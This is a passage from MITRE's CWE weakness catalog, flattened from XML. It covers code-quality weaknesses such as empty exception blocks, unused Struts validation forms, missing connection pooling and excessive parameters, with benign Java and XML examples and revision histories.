+ + Other + Reduce Maintainability + + + + + ASCMM-MNT-2 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A named-callable or method control element has a signature that + supports a variable (variadic) number of parameters or arguments. + This issue can prevent the product from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. + With variadic arguments, it can be difficult or inefficient for manual analysis to be certain of which function/method is being invoked. + + + + + + Indirect + + + + + Other + Reduce Reliability + + + + + ASCRM-RLB-8 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a dedicated, central data manager component as required by design, but it contains code that performs data-access operations that do not use this data manager. + This issue can make the product perform more slowly than intended, since the intended central data manager may have been explicitly optimized for performance or other quality characteristics. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. + + + + + + Indirect + + + + + Other + Reduce Performance + + + + + ASCPEM-PRF-11 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The code contains a function or method that + operates in a multi-threaded environment but owns an unsafe non-final + static storable or member data element. + This issue can prevent the product from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. + + + + + + + + Indirect + + + + + Other + Reduce Reliability + + + + + ASCRM-RLB-11 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not contain sufficient + technical or engineering documentation (whether on paper or + in electronic form) that contains descriptions of all the + relevant software/hardware elements of the product, such as + its usage, structure, architectural components, interfaces, design, implementation, + configuration, operation, etc. + + When technical documentation is limited or lacking, products are more difficult to maintain. This indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. + When using time-limited or labor-limited third-party/in-house security consulting services (such as threat modeling, vulnerability discovery, or pentesting), insufficient documentation can force those consultants to invest unnecessary time in learning how the product is organized, instead of focusing their expertise on finding the flaws or suggesting effective mitigations. + With respect to hardware design, the lack of a formal, final manufacturer reference can make it difficult or impossible to evaluate the final product, including post-manufacture verification. One cannot ensure that design functionality or operation is within acceptable tolerances, conforms to specifications, and is free from unexpected behavior. Hardware-related documentation may include engineering artifacts such as hardware description language (HDLs), netlists, Gerber files, Bills of Materials, EDA (Electronic Design Automation) tool files, etc. + + + + + + + Indirect + + + + + + + + + + + + Architecture and Design + + + Documentation + + + + + Other + Varies by Context + Hide Activities + Reduce Reliability + Quality Degradation + Reduce Maintainability + Without a method of verification, one cannot be sure that everything only functions as expected. + + + + + Documentation + Architecture and Design + Ensure that design documentation is detailed enough to allow for post-manufacturing verification. + + + + + Part 2-4 + Req SP.02.03 BR + + + Part 2-4 + Req SP.02.03 RE(1) + + + Part 2-4 + Req SP.03.03 RE(1) + + + Part 4-1 + Req SG-1 + + + Part 4-1 + Req SG-2 + + + Part 4-1 + Req SG-3 + + + Part 4-1 + Req SG-4 + + + Part 4-1 + Req SG-5 + + + Part 4-1 + Req SG-6 + + + Part 4-1 + Req SG-7 + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms, Common_Consequences, Description, Name, Potential_Mitigations, References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Taxonomy_Mappings + + + Paul A. Wortman + Wells Fargo + 2021-06-11 + Submitted hardware-specific information about a "golden standard" that was integrated into this entry + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-04-25 + Suggested mappings to ISA/IEC 62443. + + Incomplete Documentation + + + + When an application does not use an input validation framework such as the Struts Validator, there is a greater risk of introducing weaknesses related to insufficient input validation. + + Unchecked input is the leading cause of vulnerabilities in J2EE applications. Unchecked input leads to cross-site scripting, process control, and SQL injection vulnerabilities, among others. + Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack. + + + + + + + + Primary + + + + + + + + Implementation + + + + + Integrity + Unexpected State + + + + + Architecture and Design + Input Validation + Use an input validation framework such as Struts. + + + Architecture and Design + Libraries or Frameworks + Use an input validation framework such as Struts. + + + Implementation + Input Validation + + Use the Struts Validator to validate all program input before it is processed by the application. Ensure that there are no holes in the configuration of the Struts Validator. Example uses of the validator include checking to ensure that: + + Phone number fields contain only valid characters in phone numbers + Boolean values are only "T" or "F" + Free-form strings are of a reasonable length and composition + + + + + Implementation + Libraries or Frameworks + + Use the Struts Validator to validate all program input before it is processed by the application. Ensure that there are no holes in the configuration of the Struts Validator. Example uses of the validator include checking to ensure that: + + Phone number fields contain only valid characters in phone numbers + Boolean values are only "T" or "F" + Free-form strings are of a reasonable length and composition + + + + + + + In the following Java example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for an online business site. The user will enter registration data and, through the Struts framework, the RegistrationForm bean will maintain the user data. + + public class RegistrationForm extends org.apache.struts.action.ActionForm { + + // private variables for registration form + private String name;private String email;... + public RegistrationForm() {super();} + + // getter and setter methods for private variables + ... + } + + However, the RegistrationForm class extends the Struts ActionForm class which does use the Struts validator plug-in to provide validator capabilities. In the following example, the RegistrationForm Java class extends the ValidatorForm and Struts configuration XML file, struts-config.xml, instructs the application to use the Struts validator plug-in. + + public class RegistrationForm extends org.apache.struts.validator.ValidatorForm { + + // private variables for registration form + private String name;private String email;... + public RegistrationForm() {super();} + public ActionErrors validate(ActionMapping mapping, HttpServletRequest request) {...} + + // getter and setter methods for private variables + ... + } + + The plug-in tag of the Struts configuration XML file includes the name of the validator plug-in to be used and includes a set-property tag to instruct the application to use the file, validator-rules.xml, for default validation rules and the file, validation.XML, for custom validation. + + <struts-config> + <form-beans><form-bean name="RegistrationForm" type="RegistrationForm"/></form-beans> + ... + <!-- ========================= Validator plugin ================================= --><plug-in className="org.apache.struts.validator.ValidatorPlugIn"><set-propertyproperty="pathnames"value="/WEB-INF/validator-rules.xml,/WEB-INF/validation.xml"/> + </plug-in> + </struts-config> + + + + + + Struts: Plug-in Framework Not In Use + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2010-06-21 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-03-29 + updated Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product performs too many data queries without using efficient data processing functionality such as stored procedures. + This issue can make the product perform more slowly due to computational expense. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. + While the interpretation of "too many data queries" may vary for each product or developer, CISQ recommends a default maximum of 5 data queries for an inefficient function/procedure. + + + + + + + Indirect + + + + + Other + Reduce Performance + + + + + ASCPEM-PRF-9 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not sufficiently hide the internal representation and implementation details of data or methods, which might allow external components or modules to modify data unexpectedly, invoke unexpected functionality, or introduce dependencies that the programmer did not intend. + This issue makes it more difficult to maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2018-07-29 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The code has a parent class that contains references to a child class, its methods, or its members. + This issue can prevent the product from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. + + + + + + Indirect + + + + + Other + Reduce Reliability + + + + + ASCRM-RLB-14 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A static code block creates an instance of a class. + This pattern identifies situations where a storable data element or member data element is initialized with a value in a block of code which is declared as static. + This issue can make the product perform more slowly by performing initialization before it is needed. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. + + + + + + Indirect + + + + + Other + Reduce Performance + + + + + ASCPEM-PRF-1 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product contains a function, subroutine, or method whose signature has an unnecessarily large number of + parameters/arguments. + This issue makes it more difficult to understand and/or maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + While the interpretation of "large number of parameters." may vary for each product or developer, CISQ recommends a default maximum of 7 parameters/arguments. + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + ASCMM-MNT-13 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses deployed components from application servers, but it also uses low-level functions/methods for management of resources, instead of the API provided by the application server. + This issue can prevent the product from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. + + + + + + Indirect + + + + + Other + Reduce Reliability + + + + + ASCRM-RLB-5 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product contains a serializable data element that does not + have an associated serialization method. + This issue can prevent the product from running reliably, e.g. by triggering an exception. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. + As examples, the serializable nature of a data element comes from a serializable SerializableAttribute attribute in .NET and the inheritance from the java.io.Serializable interface in Java. + + + + + + Indirect + + + + + Other + Reduce Reliability + + + + + ASCRM-RLB-2 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product contains a data query against an SQL table or view + that is configured in a way that does not utilize an index and may cause + sequential searches to be performed. + This issue can make the product perform more slowly. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. + + + + + + Indirect + + + + + Other + Reduce Performance + + + + + ASCPEM-PRF-5 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The implementation of the product is not consistent with the + design as described within the relevant documentation. + This issue makes it more difficult to maintain the product due to inconsistencies, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + + + + + Implementation + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Description, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + An invokable code block contains an exception handling block that does not contain any code, i.e. is empty. + When an exception handling block (such as a Catch and Finally block) is used, but that block is empty, this can prevent the product from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. + + + + + + Indirect + + + + + + + + Other + Reduce Reliability + + + + + Implementation + For every exception block add code that handles the specific exception in the way intended by the application. + + + + + In the following Java example, the code catches an ArithmeticException. + + public class Main { + public static void main(String[] args) { + int a = 1; + int b = 0; + int c = 0; + try { + c = a / b; + } catch(ArithmeticException ae) { + } + } + } + + Since the exception block is empty, no action is taken. + In the code below the exception has been logged and the bad execution has been handled in the desired way allowing the program to continue in an expected way. + + public class Main { + public static void main(String[] args) { + int a = 1; + int b = 0; + int c = 0; + try { + c = a / b; + } catch(ArithmeticException ae) { + log.error("Divided by zero detected, setting to -1."); + c = -1; + } + } + } + + + + + + ASCRM-RLB-1 + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Type + + + CWE Content Team + MITRE + 2022-10-13 + updated Applicable_Platforms, Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Drew Buttner + 2022-08-15 + Suggested new demonstrative examples, mitigations, and applicable platforms. + + + + + An unused validation form indicates that validation logic is not up-to-date. + It is easy for developers to forget to update validation logic when they remove or rename action form mappings. One indication that validation logic is not being properly maintained is the presence of an unused validation form. + + + + + + + Resultant + + + + + + + + Implementation + + + Operation + + + + + Other + Quality Degradation + + + + + Implementation + Remove the unused Validation Form from the validation.xml file. + + + + + In the following example the class RegistrationForm is a Struts framework ActionForm Bean that will maintain user input data from a registration webpage for an online business site. The user will enter registration data and, through the Struts framework, the RegistrationForm bean will maintain the user data in the form fields using the private member variables. The RegistrationForm class uses the Struts validation capability by extending the ValidatorForm class and including the validation for the form fields within the validator XML file, validator.xml. + + public class RegistrationForm extends org.apache.struts.validator.ValidatorForm { + + + + // private variables for registration form + private String name;private String address;private String city;private String state;private String zipcode; + // no longer using the phone form field + + + // private String phone; + private String email; + public RegistrationForm() {super();} + + // getter and setter methods for private variables + ... + } + + + <form-validation> + <formset> + <form name="RegistrationForm"> + <field property="name" depends="required"><arg position="0" key="prompt.name"/></field><field property="address" depends="required"><arg position="0" key="prompt.address"/></field><field property="city" depends="required"><arg position="0" key="prompt.city"/></field><field property="state" depends="required,mask"><arg position="0" key="prompt.state"/><var><var-name>mask</var-name><var-value>[a-zA-Z]{2}</var-value></var></field><field property="zipcode" depends="required,mask"><arg position="0" key="prompt.zipcode"/><var><var-name>mask</var-name><var-value>\d{5}</var-value></var></field><field property="phone" depends="required,mask"><arg position="0" key="prompt.phone"/><var><var-name>mask</var-name><var-value>^([0-9]{3})(-)([0-9]{4}|[0-9]{4})$</var-value></var></field><field property="email" depends="required,email"><arg position="0" key="prompt.email"/></field> + </form> + </formset> + </form-validation> + + However, the validator XML file, validator.xml, for the RegistrationForm class includes the validation form for the user input form field "phone" that is no longer used by the input form and the RegistrationForm class. Any validation forms that are no longer required should be removed from the validator XML file, validator.xml. + The existence of unused forms may be an indication to attackers that this code is out of date or poorly maintained. + + + + + Struts: Unused Validation Form + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2010-06-21 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product contains a serializable, storable data element such as a field or member, + but the data element contains member elements that are not + serializable. + This issue can prevent the product from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. + As examples, the serializable nature of a data element comes from a serializable SerializableAttribute attribute in .NET and the inheritance from the java.io.Serializable interface in Java. + + + + + + + Indirect + + + + + Other + Reduce Reliability + + + + + ASCRM-RLB-3 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The source code contains a block that does not contain any code, i.e., the block is empty. + Empty code blocks can occur in the bodies of conditionals, function or method definitions, exception handlers, etc. While an empty code block might be intentional, it might also indicate incomplete implementation, accidental code deletion, unexpected macro expansion, etc. For some programming languages and constructs, an empty block might be allowed by the syntax, but the lack of any behavior within the block might violate a convention or API in such a way that it is an error. + + + + + + + Indirect + + + + + Other + Reduce Reliability + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2019-01-02 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Type + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product accesses a data resource through a database without using a + connection pooling capability. + This issue can make the product perform more slowly, as connection pools allow connections to be reused without the overhead and time consumption of opening and closing a new connection. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. + + + + + + Indirect + + + + + Other + Reduce Performance + + + + + ASCPEM-PRF-13 + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product contains a client with a function or method that contains a large number of data accesses/queries that are sent through a data manager, i.e., does not use efficient database capabilities. + This issue can make the product perform more slowly. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. + While the interpretation of "large number of data accesses/queries" may vary for each product or developer, CISQ recommends a default maximum of 2 data accesses per function/method. + + + + + + Indirect + + + + + Other + Reduce Performance + + + + + ASCPEM-PRF-10 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A class has an inheritance level that is too high, i.e., it + has a large number of parent classes. + This issue makes it more difficult to understand and maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + While the interpretation of "large number of parent classes" may vary for each product or developer, CISQ recommends a default maximum of 7 parent classes. + + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + ASCMM-MNT-17 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 